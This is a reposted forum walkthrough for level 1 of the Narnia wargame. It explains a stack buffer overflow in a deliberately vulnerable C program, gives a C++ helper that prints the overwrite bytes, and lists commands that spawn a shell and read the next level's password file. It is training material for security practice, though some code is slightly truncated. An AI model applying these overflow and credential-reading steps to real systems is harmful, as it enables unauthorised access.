ORIGINALLY POSTED BY OUTERLIMIT FOR THETAZZONE/TAZFORUM HERE

Do not use, republish, in whole or in part, without the consent of the Author. TheTAZZone policy is that Authors retain the rights to the work they submit and/or post…we do not sell, publish, transmit, or have the right to give permission for such…TheTAZZone merely retains the right to use, retain, and publish submitted work within it’s Network

[img]http://www.tazforum.com/images/TAZBANNERabc.gif[/img]

This is related to the wargames Harry posted…
It is for the server narnia. http://www.intruded.net/narnia.html
The objective on this box is to look at the source code to the program for the level you are on, and find a way to exploit or accomplish what it asks.

This is my solution and explanation of level1.

Once you login:
cd /wargame

The program you are trying to use is level1, the source code is level1.c

[code]int main(){
long val=0x41414141;
char buf[20];

printf(“Correct val’s value from 0x41414141 -> 0xdeadbeef!\n”);
printf(“Here is your chance: “);
scanf(“%24s”,&buf);

printf(“buf: %s\n”,buf);
printf(“val: 0x%08x\n”,val);

if(val==0xdeadbeef){
seteuid(1002);
system(“/bin/sh”);
} else {
printf(“WAY OFF!!!!\n”);
exit(1);
}

return 0;
}[/code]

Looking at this code, they want you to change vals value from 0x41414141 to 0xdeadbeef.
Also if you notice, it prompts you for input and stores it into the variable buf. And then prints out val…
The variable buf is declared as an array with 20 elements, and since there is nothing checking the size of the input, it allows for a buffer overflow.

You can play around with this by entering inputs of varying lengths.
You should notice that anything less than 20 characters does not effect the value of val, but if you input something more than 20 characters, the value of val changes.

This is how you are going to accomplish changing the value to 0xdeadbeef.

You can figure out how what you enter effects the value by entering in 000000000000000000000 (21 0’s).
Your output becomes 0x41410030
By inputting 20 0’s followed by a single different character you can see how the value changes.
Closer inspection shows that the last two digits is the ascii value of the key you entered.

So basically what you have to do is enter in 20 0’s, and then whatever makes ascii values you need…
If you look at an ascii table, these are not standard letters on your keyboard… Some of them aren’t even documented.

So what I did was wrote a C++ program to print out each character for me…
[code]#include
using namespace std;

int main(int argc, char* argv[])
{
unsigned long target = 0xdeadbeef;
char *p = (char *) ⌖
for (int i = 0; i < 4; i++) {
cout << p[i];
}
return 0;
}[/code]

This program will print out the characters you need to use after the 20 0’s in order to pass the level and replace val with 0xdeadbeef.

In order to get the 4 characters we need, we use a char pointer. A char is stored as 1 byte in memory. 0xdeadbeef is 4 stored as 4 consecutive bytes.
We need the char pointer to point to the first byte of 0xdeadbeef.
This is done by setting our pointer equal to the address of target…
[code] char *p = &target;[/code]
However, the compiler does not like that because target is a long integer, not a character.
So we must type cast the address of target to that of a char
[code] char *p = (char *) &target;
Now, p points to the beginning of target… we know that it is 4 bytes long, so we need to print 4 characters.
C++ will let you use a pointer as an array, each next element of the array increases the address it points to by the size of the pointer.
In the case of a char pointer, it increments by 1 byte each time.

So following the for loop we will print p[0], p[1], p[2], p[3].
Those are the 4 characters needed in the first program to set val equal to 0xdeadbeef.

In order to run the program you can do this:
Copy the code
type this: cat > /tmp/lvl1.cpp
Paste the code
Press cntrl D
type this: g++ -o /tmp/lvl1 /tmp/lvl1.cpp
chmod +x /tmp/lvl1
/tmp/lvl1

Now copy the 4 characters

then run /wargame/level1
type in 20 0’s, and paste those characters.

Now you should have a new shell as level2
cat /home/level2/.passwd

Continue on to level2

Good luck!

By admin

Former Freehand Freelance Graphic Illustrator... been online since 2004 ( late starter ), blogging since 2005, presently writing a suspense-thriller e-book that began as a screenplay.

2 thoughts on “Intruded.net – Narnia – Level1 Solution”

Leave a Reply

Your email address will not be published. Required fields are marked *